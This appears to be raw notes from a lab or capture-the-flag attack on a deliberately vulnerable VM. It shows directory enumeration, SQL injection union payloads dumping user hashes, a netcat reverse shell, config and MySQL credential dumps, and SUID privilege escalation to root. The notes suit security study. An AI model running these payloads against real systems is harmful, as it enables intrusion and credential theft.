└─$ sudo dirsearch -u http://192.168.178.147
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ed/reports/http_192.168.178.147/_25-05-29_20-00-32.txt

Target: http://192.168.178.147/

[20:00:32] Starting: 
[20:00:33] 403 -  301B  - /.ht_wsr.txt
[20:00:33] 403 -  304B  - /.htaccess.bak1
[20:00:33] 403 -  304B  - /.htaccess.save
[20:00:33] 403 -  304B  - /.htaccess.orig
[20:00:33] 403 -  306B  - /.htaccess.sample
[20:00:33] 403 -  305B  - /.htaccess_extra
[20:00:33] 403 -  304B  - /.htaccess_orig
[20:00:33] 403 -  302B  - /.htaccess_sc
[20:00:33] 403 -  302B  - /.htaccessBAK
[20:00:33] 403 -  302B  - /.htaccessOLD
[20:00:33] 403 -  303B  - /.htaccessOLD2
[20:00:33] 403 -  294B  - /.htm
[20:00:33] 403 -  295B  - /.html
[20:00:33] 403 -  304B  - /.htpasswd_test
[20:00:33] 403 -  300B  - /.htpasswds
[20:00:33] 403 -  301B  - /.httr-oauth
[20:00:34] 403 -  294B  - /.php
[20:00:43] 200 -    0B  - /config.php
[20:00:52] 200 -  527B  - /login.php
[20:00:52] 302 -    0B  - /logout.php  ->  login.php
[20:00:58] 200 -  594B  - /register.php
[20:00:59] 403 -  303B  - /server-status
[20:01:00] 403 -  304B  - /server-status/
[20:01:04] 301 -  320B  - /uploads  ->  http://192.168.178.147/uploads/
[20:01:04] 200 -  460B  - /uploads/

//login.php, register a account and access a search box, sqli

union select databases(),1,2

webapphacking databases(table.schema) 
 'union select table_name,2,3 from information_schema.tables where table.schema='webapphacking'

 ' union select table_name,2,3 from INFORMATION_SCHEMA.TABLES where table_schema = 'webapphacking'# 
 users

 search='  union select column_name,2,3 from INFORMATION_SCHEMA.columns where table_schema = 'webapphacking' and table_name = 'users'# 
 id,user,password

 '  union select id,user,pasword from webapphacking.users# 

 superadmin</td><td>2386acb2cf356944177746fc92523983 SGD  Uncrackable
 admin</td><td>0192023a7bbd73250516f069df18b500 SGD admin123 //this is my account!!!


 find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
/sbin/mount.cifs
/usr/sbin/pppd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/arping
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/umount
/bin/fusermount
/home/user5/script
/home/user3/shell





 └─$ nc -nvlp 8821                   
listening on [any] 8821 ...
connect to [192.168.178.129] from (UNKNOWN) [192.168.178.147] 37108
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:18:55 up  2:20,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@hackme:/$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
hackme:x:1000:1000:hackme:/home/hackme:/bin/bash

www-data@hackme:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'hackme1qaz@WSX');
define('DB_NAME', 'webapphacking');
 
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount

mysql> select User,authentication_string from user;
select User,authentication_string from user;
+------------------+-------------------------------------------+
| User             | authentication_string                     |
+------------------+-------------------------------------------+
| root             | *E5D6879EE8B120C4DFDE4B3CEAC85F737FFB218A |
| mysql.session    | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *BEF79CAE4AA44198E4E6F9E36FF01A4D4315D87F |
+------------------+-------------------------------------------+


www-data@hackme:/tmp$ cd /home
cd /home
www-data@hackme:/home$ cd legacy
cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@hackme:/home/legacy# cd /root
